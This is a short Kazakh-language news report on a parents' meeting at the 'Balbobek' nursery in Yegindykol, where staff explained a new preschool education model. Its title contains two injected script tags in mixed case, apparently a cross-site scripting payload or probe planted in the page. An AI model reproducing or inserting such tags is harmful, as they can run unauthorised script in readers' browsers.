Мектепке дейінгі тәрбие мен оқытуды дамытудың жаңа моделін түсіндіру бойынша ата-аналар жиналысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

26.10.2022

2022 жылдың 22 қазанында Ақмола облысы білім басқармасының Егіндікөл ауданы бойынша білім бөлімі жанындағы Егіндікөл ауылының "Балбөбек" бөбекжайы" МКҚК-да  мектепке дейінгі тәрбие мен оқытуды дамытудың жаңа моделін түсіндіру бойынша ата-аналар жиналысы өтті.

Жиналыс аясында әдіскер Ахметжанова А.А. "Мектепке дейінгі тәрбие мен оқытуды дамыту моделін іске асыру: мектепке дейінгі білім беру деңгейіндегі сапалы трансформация" атты баяндама жасады.

Балабақшаның медицина қызметкері Курдиновская Н.Ю. санитарлық нормалардың сақталуына, 3 күннен артық бала болмаған кезде эпидемиологиялық орта туралы анықтама алуға қатысты түсініктеме берді.

Ата-аналар "Күні бойы мектепке дейінгі ұйым тобындағы екі педагог" жобасын ұйымдастыруға, үлгілік оқу бағдарламасындағы өзгерістерге, топтарда кітап қорын қалыптастыру мәселесіне қызығушылық танытты.

Ата-аналарға тиісті түсініктемелер мен ұсыныстар берілді.

Просмотров: 776


Пікір қосу



Деректерді қолтаңбаға қосу